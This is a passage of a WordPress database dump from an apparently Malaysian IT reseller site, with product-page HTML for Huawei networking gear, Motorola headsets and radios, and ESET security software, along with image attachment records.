09:21:33','',1534,'https://bintara.com.my/blog/2018/12/18/1534-revision-v1/',0,'revision','',0),(2377,1,'2018-12-18 17:22:21','2018-12-18 09:22:21','<h3>Enterprise Wireless</h3>\r\n<h4>Intelligent Wireless Connections, Building Digital Industries</h4>\r\nWhat Are the Benefits of the Enterprise Wireless?\r\n<ul>\r\n 	<li>Multiple Services on One Network</li>\r\n 	<li>Industrial-Grade Reliability</li>\r\n 	<li>Access Anytime and Anywhere</li>\r\n</ul>\r\nHuawei uses leading 4.5G wireless technologies and its in-depth understanding of industry customers to provide the eLTE Multimedia Critical Communications System (MCCS) Solution, the 4.5G-based eLTE narrowband and broadband integrated wireless IoT solution, and the GSM-R solution for a wide range of services, such as narrowband, broadband, voice, multimedia, fixed, and mobile. Huawei also builds a professional and reliable mobile communications platform for diverse industry applications, such as professional trunking voice, wireless video surveillance, broadband data access, mass data collection, railway wireless dispatching, and high-speed train control.\r\n<h3></h3>\r\n&nbsp;\r\n<h3 class=\"title\">Enterprise Routers</h3>\r\n<div class=\"sub-title\">\r\n\r\nRouters with large-capacity, high-reliability, easy O&amp;M, and low power consumption help enterprises in various industries to quickly achieve digital transformation.\r\n<h4>NE Series Routers</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHighest performance routers to power innovative enterprise applications from small to super huge scale. Carrier-grade reliability, flexible modular architecture, and energy-efficient technologies add up to great service at lowest TCO.\r\n<h4>ME60 Series</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\n2T hardware platform, providing 10G to 480G line cards (including 160G CGN line cards), supporting a maximum of 256K concurrent users and allowing 1,200 users to go online per second.\r\n<h4>PTN 7900 Series</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe OptiX PTN 7900 NE is a new-generation high-capacity, high-bandwidth, and software-defined core device that supports smart services.\r\n<h4>AR502 Series IoT Gateways</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe AR502 uses the built-in industrial-grade LTE module, and offers high bandwidth and low-latency wireless access. It provides various local interfaces and applies to a number of IoT fields, such as smart grid, smart city, and smart building.\r\n<h4>AR1200 Series Enterprise Routers</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe AR1200 is a multi-service router designed for Small and Medium-sized Enterprises (SMEs). It provides Internet access, dedicated line access, and voice, security, and wireless functions. It can be deployed at the egress of small and medium-sized campus networks and the headquarters and branches of SMEs.\r\n\r\n</div>\r\n<h3></h3>\r\n&nbsp;\r\n<h3>Why Huawei Routers?</h3>\r\n<h4>Leading Market Share</h4>\r\nHuawei routers ranked No. 1 in China and No. 2 in the global market, and 70% of carriers and enterprise network NAs use them.\r\n<h4>Strong Development Capabilities</h4>\r\nHuawei is a leader and outstanding contributor in the IP standards field. Its proprietary Solar chipset had large-scale commercial use on the live network in 2013 and more than 3 million chips were delivered, and the Huawei-proprietary VRP software is the culmination of 17 years of innovation.\r\n<h4>Award Winning Products</h4>\r\nHuawei routers have won multiple international awards, including SDN-VDC InfoVision award and Japanâ€™s Interop gold award, and they have obtained certification from multiple third-party authoritative organizations worldwide.\r\n\r\n&nbsp;\r\n<div class=\"txtbox mask-gradient\">\r\n<h3 class=\"title\">Switches</h3>\r\n<div class=\"sub-title\">For a wide variety of applications and networkÂ sizes, fromÂ cloud data centers to campus networks</div>\r\n</div>\r\n<div>\r\n<h5></h5>\r\n<h4>Campus Switches</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHuaweiâ€™s self-developed, innovative data center, campus, and carrier switch portfolios help accelerate your digital transformation.\r\n<h4>Data Center Switches</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nCloudEngine series switches offer carrier-grade reliability, virtualization support, iStack clustering, and Software-Defined Networking features for building and scaling data centers and campus networks. They provide versatility and resilient performance for server-based multimedia applications, Big Data analytics, and cloud computing.\r\n<h3></h3>\r\n&nbsp;\r\n<h3>Why Huawei Switches?</h3>\r\n<h4>Diversified Products and Solutions</h4>\r\nHuawei provides the most complete portfolio of data center network and campus products, supporting customers business requirements for digital transformation and enabling their rapid growth of virtualization, Big Data, and cloud services.\r\n<h4>Extensive Customer Cases</h4>\r\nHuawei switches have been deployed for enterprises in more than 150 countries and are widely used in sectors such as finance, Internet, retail, education, manufacturing, and public services. Huaweiâ€™s data center network and wired and wireless convergence solutions are rated as Challenger and Visionary in Gartnerâ€™s Magic Quadrant, respectively.\r\n<h4>Many Global Channels and Localized Services</h4>\r\nHuawei switches support tens of thousands of channels and partners in 150 countries, providing innovative switch solutions in all industries and localized services.\r\n<h3></h3>\r\n&nbsp;\r\n<h3 class=\"title\">Servers - Intelligent Computing</h3>\r\n<div class=\"sub-title\">\r\n\r\nBoundless Computing Inspires an Intelligent Digital World.\r\n<h4>FusionServer 2488H V5 Rack Server</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe FusionServer 2488H V5 is Huaweiâ€™s latest 2U 4-socket rack server. It is ideal for compute-intensive scenarios such as virtualization, High-Performance Computing (HPC), database, and SAP HANA.\r\n<h4>TaiShan 2280 ARM Server</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nA 2U, 2-socket rack server powered by Huawei 64-bit ARMv8 Hi1616 processors that provides high performance with low power consumption.\r\n<h4>FusionServer G5500 Data Center Heterogeneous Server</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nFusionServer G5500 is a heterogeneous server positioned for data center deployment. It offers the best-in-class heterogeneous computing platform for scenarios such as Artificial Intelligence (AI), HPC, intelligent cloud, video analytics, and database acceleration.\r\n<h4>Huawei FusionCube HCI</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHuawei FusionCube HCI (Hyper-Converged Infrastructure) is an IT platform based on a hyper-converged architecture. It complies with open architecture standards, converges compute and storage, and pre-integrates distributed storage engines, virtualization, and cloud management software, allowing for resource-on-demand provisioning and linear expansion.FusionCube HCI supports various hardware form factors including blade, high-density, and rack, meeting the flexible configuration requirements of different services for compute, storage, and I/O resources. The FusionCube HCI applies to cloud computing scenarios and is an ideal choice for deploying the IT infrastructure of cloud data centers.\r\n<h4>KunLun Mission Critical Server</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nKunLun is designed for mission-critical workloads and is ideal for core databases, database application consolidation, in-memory computing, High-Performance Computing (HPC) fat nodes, and more scenarios. With innovative RAS 2.0 technology, the server offers an open x86 ecosystem with the reliability of UNIX servers, helping customers move from closed to open architecture and unlock innovation potential.\r\n<h4>FX-Series FPGA Accelerator Cards</h4>\r\n<div class=\"txtbox mask-gradient\">These accelerator cards provide high-performance compute power and high-bandwidth data connections, making them ideal for hardware-accelerated services.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n\r\n&nbsp;\r\n<h3>Why Huawei Servers?</h3>\r\n<h4>Efficient and Reliable</h4>\r\nTo ensure that we meet customer requirements for servers, Huawei implements stringent quality control across eight processes, including product planning, R&amp;D, supply chain management, and post-sales service. Before delivery, each product has undergone more than 2,000 hardware tests, 10,000 software tests, and 300 entry certifications.\r\n<h4>Continuous Innovation</h4>\r\nHuaweiâ€™s Boundless Computing strategy accelerates innovation at the chip level across computing, storage, and networking technologies, moving enterprise intelligence toward a better-connected, smart world. Huawei has focused its years of R&amp;D development efforts by setting up global OpenLabs to collaborate with top partners.\r\n<h4>Trustworthy</h4>\r\nHuawei successfully cooperates with customers and technology partners, striving to provide open computing infrastructure that supports optimal customer and partner outcomes. With solid reliability, excellent performance, and easy integration, Huawei servers are used by more than 5,000 customers worldwide in more than 25 sectors.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Huawei','','inherit','closed','closed','','1534-revision-v1','','','2018-12-18 17:22:21','2018-12-18 09:22:21','',1534,'https://bintara.com.my/blog/2018/12/18/1534-revision-v1/',0,'revision','',0),(2379,1,'2018-12-18 18:44:05','2018-12-18 10:44:05','','H720 Motorola','','inherit','closed','closed','','h720-motorola','','','2018-12-18 18:44:05','2018-12-18 10:44:05','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/H720-Motorola.png',0,'attachment','image/png',0),(2380,1,'2018-12-18 18:44:06','2018-12-18 10:44:06','','H730 Motorola','','inherit','closed','closed','','h730-motorola','','','2018-12-18 18:44:06','2018-12-18 10:44:06','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/H730-Motorola.png',0,'attachment','image/png',0),(2381,1,'2018-12-18 18:44:08','2018-12-18 10:44:08','','H790 Motorola','','inherit','closed','closed','','h790-motorola','','','2018-12-18 18:44:08','2018-12-18 10:44:08','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/H790-Motorola.png',0,'attachment','image/png',0),(2382,1,'2018-12-18 18:44:09','2018-12-18 10:44:09','','HK100 Motorola','','inherit','closed','closed','','hk100-motorola','','','2018-12-18 18:44:09','2018-12-18 10:44:09','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/HK100-Motorola.png',0,'attachment','image/png',0),(2383,1,'2018-12-18 18:44:11','2018-12-18 10:44:11','','HK200 HK201 HK202','','inherit','closed','closed','','hk200-hk201-hk202','','','2018-12-18 18:44:11','2018-12-18 10:44:11','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/HK200-HK201-HK202.png',0,'attachment','image/png',0),(2384,1,'2018-12-18 18:44:12','2018-12-18 10:44:12','','HX520','','inherit','closed','closed','','hx520','','','2018-12-18 18:44:12','2018-12-18 10:44:12','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/HX520.png',0,'attachment','image/png',0),(2385,1,'2018-12-18 18:44:14','2018-12-18 10:44:14','','HX550','','inherit','closed','closed','','hx550','','','2018-12-18 18:44:14','2018-12-18 10:44:14','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/HX550.png',0,'attachment','image/png',0),(2386,1,'2018-12-18 18:44:15','2018-12-18 10:44:15','','HZ720','','inherit','closed','closed','','hz720','','','2018-12-18 18:44:15','2018-12-18 10:44:15','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/HZ720.png',0,'attachment','image/png',0),(2387,1,'2018-12-18 18:44:17','2018-12-18 10:44:17','','Motorola HZ800','','inherit','closed','closed','','motorola-hz800','','','2018-12-18 18:44:17','2018-12-18 10:44:17','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-HZ800.png',0,'attachment','image/png',0),(2388,1,'2018-12-18 18:44:18','2018-12-18 10:44:18','','S10 HD','','inherit','closed','closed','','s10-hd','','','2018-12-18 18:44:18','2018-12-18 10:44:18','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/S10-HD.png',0,'attachment','image/png',0),(2389,1,'2018-12-18 18:44:20','2018-12-18 10:44:20','','S305 Motorola','','inherit','closed','closed','','s305-motorola','','','2018-12-18 18:44:20','2018-12-18 10:44:20','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/S305-Motorola.png',0,'attachment','image/png',0),(2390,1,'2018-12-18 18:58:53','2018-12-18 10:58:53','','Motorola GP328','','inherit','closed','closed','','motorola-gp328','','','2018-12-18 18:58:53','2018-12-18 10:58:53','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-GP328.png',0,'attachment','image/png',0),(2391,1,'2018-12-18 18:58:55','2018-12-18 10:58:55','','Motorola Mototrbo (XiR E8600 Digital)','','inherit','closed','closed','','motorola-mototrbo-xir-e8600-digital','','','2018-12-18 18:58:55','2018-12-18 10:58:55','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-E8600-Digital.png',0,'attachment','image/png',0),(2392,1,'2018-12-18 18:58:56','2018-12-18 10:58:56','','Motorola Mototrbo (XiR P3688 Digital)','','inherit','closed','closed','','motorola-mototrbo-xir-p3688-digital','','','2018-12-18 18:58:56','2018-12-18 10:58:56','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P3688-Digital.jpg',0,'attachment','image/jpeg',0),(2393,1,'2018-12-18 18:58:57','2018-12-18 10:58:57','','Motorola Mototrbo (XiR P6600 Digital)','','inherit','closed','closed','','motorola-mototrbo-xir-p6600-digital','','','2018-12-18 18:58:57','2018-12-18 10:58:57','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P6600-Digital.jpg',0,'attachment','image/jpeg',0),(2394,1,'2018-12-18 18:58:59','2018-12-18 10:58:59','','Motorola Mototrbo (XiR P6620 Digital)','','inherit','closed','closed','','motorola-mototrbo-xir-p6620-digital','','','2018-12-18 18:58:59','2018-12-18 10:58:59','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P6620-Digital.png',0,'attachment','image/png',0),(2395,1,'2018-12-18 18:59:00','2018-12-18 10:59:00','','Motorola T260 Rechargeable Two-Way Radios','','inherit','closed','closed','','motorola-t260-rechargeable-two-way-radios','','','2018-12-18 18:59:00','2018-12-18 10:59:00','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-T260-Rechargeable-Two-Way-Radios.jpg',0,'attachment','image/jpeg',0),(2396,1,'2018-12-18 18:59:02','2018-12-18 10:59:02','','Motorola Talkabout T465 Rechargeable Two-Way Radio BundleÂ ','','inherit','closed','closed','','motorola-talkabout-t465-rechargeable-two-way-radio-bundle','','','2018-12-18 18:59:02','2018-12-18 10:59:02','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Talkabout-T465-Rechargeable-Two-Way-Radio-Bundle-.jpg',0,'attachment','image/jpeg',0),(2397,1,'2018-12-18 18:59:04','2018-12-18 10:59:04','','Motorola TLKR-T41','','inherit','closed','closed','','motorola-tlkr-t41','','','2018-12-18 18:59:04','2018-12-18 10:59:04','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-TLKR-T41.jpg',0,'attachment','image/jpeg',0),(2398,1,'2018-12-18 18:59:06','2018-12-18 10:59:06','','Motorola TLKR-T61 2 Pack','','inherit','closed','closed','','motorola-tlkr-t61-2-pack','','','2018-12-18 18:59:06','2018-12-18 10:59:06','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-TLKR-T61-2-Pack.jpg',0,'attachment','image/jpeg',0),(2399,1,'2018-12-18 18:59:08','2018-12-18 10:59:08','','Motorola Walkie Talkie TLKR T60Z (2 Handsets)','','inherit','closed','closed','','motorola-walkie-talkie-tlkr-t60z-2-handsets','','','2018-12-18 18:59:08','2018-12-18 10:59:08','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Walkie-Talkie-TLKR-T60Z-2-Handsets.jpg',0,'attachment','image/jpeg',0),(2400,1,'2018-12-18 18:59:10','2018-12-18 10:59:10','','Motorola XT180 Walkie Talkies & 2 Way Radios','','inherit','closed','closed','','motorola-xt180-walkie-talkies-2-way-radios','','','2018-12-18 18:59:10','2018-12-18 10:59:10','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-XT180-Walkie-Talkies-2-Way-Radios.jpg',0,'attachment','image/jpeg',0),(2401,1,'2018-12-18 19:03:34','2018-12-18 11:03:34','','tlkr t40','','inherit','closed','closed','','tlkr-t40','','','2018-12-18 19:03:34','2018-12-18 11:03:34','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/tlkr-t40.jpg',0,'attachment','image/jpeg',0),(2404,1,'2018-12-18 19:13:50','2018-12-18 11:13:50','','macbook pro','','inherit','closed','closed','','macbook-pro','','','2018-12-18 19:13:50','2018-12-18 11:13:50','',1439,'https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg',0,'attachment','image/jpeg',0),(2402,1,'2018-12-18 19:04:14','2018-12-18 11:04:14','<h2>BLUETOOTH HEADSETS</h2>\r\n<table style=\"height: 335px;\" width=\"800\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2387\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-HZ800.png\" alt=\"\" width=\"124\" height=\"124\" /></p>\r\n<p style=\"text-align: center;\"><strong style=\"font-family: inherit; font-size: inherit;\">HZ800</strong></p>\r\n</td>\r\n<td width=\"100\">&nbsp;\r\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-2389 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/S305-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /><strong>S305</strong></p>\r\n</td>\r\n<td width=\"100\">&nbsp;\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2378 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H525-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /></p>\r\n<p style=\"text-align: center;\"><strong>H525</strong></p>\r\n</td>\r\n<td width=\"100\">&nbsp;\r\n<p style=\"text-align: center;\"><img class=\"size-full wp-image-2379 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H720-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /></p>\r\n<p style=\"text-align: center;\"><strong style=\"font-family: inherit; font-size: inherit;\">H720</strong></p>\r\n</td>\r\n<td width=\"100\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2380\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H730-Motorola.png\" alt=\"\" width=\"136\" height=\"136\" /></p>\r\n<p style=\"text-align: center;\"><strong>H730</strong></p>\r\n</td>\r\n<td width=\"100\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2381\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H790-Motorola.png\" alt=\"\" width=\"143\" height=\"143\" /></p>\r\n<p style=\"text-align: center;\"><strong>H790</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2382\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HK100-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HK100</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2383\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HK200-HK201-HK202.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HK200 / HK201 / HK202</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2384\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HX520.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HX520</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2385\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HX550.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HX550</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HZ720.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HZ720</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2388\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/S10-HD.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>S10 HD</strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>WALKIE TALKIE</h2>\r\n<table style=\"height: 358px;\" width=\"997\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2400\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-XT180-Walkie-Talkies-2-Way-Radios.jpg\" alt=\"\" width=\"351\" height=\"444\" />\r\n<p style=\"text-align: center;\"><strong>Motorola XT180 Walkie Talkies &amp; 2 Way Radios</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2398\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-TLKR-T61-2-Pack.jpg\" alt=\"\" width=\"600\" height=\"600\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola TLKR-T61 2 Pack</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2399\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Walkie-Talkie-TLKR-T60Z-2-Handsets.jpg\" alt=\"\" width=\"1500\" height=\"1500\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Walkie Talkie TLKR T60Z (2 Handsets)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-TLKR-T41.jpg\" alt=\"\" width=\"600\" height=\"600\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola TLKR-T41</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tlkr-t40.jpg\" alt=\"\" width=\"1600\" height=\"1600\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Walkie Talkie TLKR t40</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone  wp-image-2395\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-T260-Rechargeable-Two-Way-Radios.jpg\" alt=\"\" width=\"207\" height=\"155\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola T260 Rechargeable Two-Way Radios</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2396\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Talkabout-T465-Rechargeable-Two-Way-Radio-Bundle-.jpg\" alt=\"\" width=\"500\" height=\"500\" />\r\n<p style=\"text-align: center;\"><strong>Motorola Talkabout T465 Rechargeable Two-Way Radio BundleÂ </strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2390\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-GP328.png\" alt=\"\" width=\"427\" height=\"427\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola GP328</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-E8600-Digital.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR E8600 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P6600-Digital.jpg\" alt=\"\" width=\"427\" height=\"427\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P6600 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2394\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P6620-Digital.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P6620 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P3688-Digital.jpg\" alt=\"\" width=\"324\" height=\"324\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P3688 Digital)</strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[maxbutton id=\"1\" ]','Motorola','','inherit','closed','closed','','1550-revision-v1','','','2018-12-18 19:04:14','2018-12-18 11:04:14','',1550,'https://bintara.com.my/blog/2018/12/18/1550-revision-v1/',0,'revision','',0),(2417,1,'2018-12-18 20:02:35','2018-12-18 12:02:35','','Epson WorkForce Enterprise WF-C17590','','inherit','closed','closed','','epson-workforce-enterprise-wf-c17590','','','2018-12-18 20:02:35','2018-12-18 12:02:35','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg',0,'attachment','image/jpeg',0),(2419,1,'2018-12-18 20:04:57','2018-12-18 12:04:57','','Epson WorkForce WF-100','','inherit','closed','closed','','epson-workforce-wf-100','','','2018-12-18 20:04:57','2018-12-18 12:04:57','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png',0,'attachment','image/png',0),(2418,1,'2018-12-18 20:04:21','2018-12-18 12:04:21','','Epson WorkForce Pro WF-C5290','','inherit','closed','closed','','epson-workforce-pro-wf-c5290','','','2018-12-18 20:04:21','2018-12-18 12:04:21','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png',0,'attachment','image/png',0),(2424,1,'2018-12-18 20:08:19','2018-12-18 12:08:19','','Epson AcuLaser C9300N','','inherit','closed','closed','','epson-aculaser-c9300n','','','2018-12-18 20:08:19','2018-12-18 12:08:19','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png',0,'attachment','image/png',0),(2426,1,'2018-12-18 20:15:06','2018-12-18 12:15:06','','Epson WorkForce AL-M320DNÂ ','','inherit','closed','closed','','epson-workforce-al-m320dn','','','2018-12-18 20:15:06','2018-12-18 12:15:06','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg',0,'attachment','image/jpeg',0),(2428,1,'2018-12-18 20:17:11','2018-12-18 12:17:11','','Epson TM-H6000IV','','inherit','closed','closed','','epson-tm-h6000iv','','','2018-12-18 20:17:11','2018-12-18 12:17:11','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png',0,'attachment','image/png',0),(2430,1,'2018-12-18 20:18:30','2018-12-18 12:18:30','','Epson TM-T70II','','inherit','closed','closed','','epson-tm-t70ii','','','2018-12-18 20:18:30','2018-12-18 12:18:30','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png',0,'attachment','image/png',0),(2427,1,'2018-12-18 20:16:26','2018-12-18 12:16:26','','Epson WorkForce AL-M8100DNÂ ','','inherit','closed','closed','','epson-workforce-al-m8100dn','','','2018-12-18 20:16:26','2018-12-18 12:16:26','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png',0,'attachment','image/png',0),(2432,1,'2018-12-18 20:20:12','2018-12-18 12:20:12','','Â Epson L850 Printer','','inherit','closed','closed','','epson-l850-printer','','','2018-12-18 20:20:12','2018-12-18 12:20:12','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png',0,'attachment','image/png',0),(2434,1,'2018-12-18 20:21:47','2018-12-18 12:21:47','','Epson EB-2055','','inherit','closed','closed','','epson-eb-2055','','','2018-12-18 20:21:47','2018-12-18 12:21:47','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png',0,'attachment','image/png',0),(2435,1,'2018-12-18 20:22:30','2018-12-18 12:22:30','','Epson EB-2142W','','inherit','closed','closed','','epson-eb-2142w','','','2018-12-18 20:22:30','2018-12-18 12:22:30','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg',0,'attachment','image/jpeg',0),(2441,1,'2018-12-18 20:29:34','2018-12-18 12:29:34','','EB-L1405UNL','','inherit','closed','closed','','eb-l1405unl','','','2018-12-18 20:29:34','2018-12-18 12:29:34','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png',0,'attachment','image/png',0),(2439,1,'2018-12-18 20:27:50','2018-12-18 12:27:50','','Epson EB-536Wi','','inherit','closed','closed','','epson-eb-536wi','','','2018-12-18 20:27:50','2018-12-18 12:27:50','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png',0,'attachment','image/png',0),(2440,1,'2018-12-18 20:28:45','2018-12-18 12:28:45','','Epson 595Wi','','inherit','closed','closed','','epson-595wi','','','2018-12-18 20:28:45','2018-12-18 12:28:45','',1486,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png',0,'attachment','image/png',0),(2446,1,'2018-12-18 20:59:14','2018-12-18 12:59:14','','eset','','inherit','closed','closed','','eset-2','','','2018-12-18 20:59:14','2018-12-18 12:59:14','',1477,'https://bintara.com.my/wp-content/uploads/2018/12/eset.png',0,'attachment','image/png',0),(2448,1,'2018-12-18 21:00:34','2018-12-18 13:00:34','<h1><strong>Protecting you worldwide</strong></h1>\r\nESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe. We protect users just like you across 200 countries and territories worldwide, helping them to use and explore all the great opportunities of the Internet. We are proud that so many individuals and companies trust us to secure their digital lives.\r\n<h2><strong>Efficient endpoint security for small businesses</strong></h2>\r\n<h3><strong>Manage network security via the cloud. NoÂ need for extra hardware</strong></h3>\r\nManage IT security conveniently using ESET Cloud Administrator.Â Benefit from a single-point overview of your network security. Receive notifications as incidents occur. React immediately from wherever you are.\r\n\r\n<img class=\"alignnone  wp-image-2446\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/eset.png\" alt=\"\" width=\"291\" height=\"203\" />\r\n<ul>\r\n 	<li>All your network security management in one place</li>\r\n 	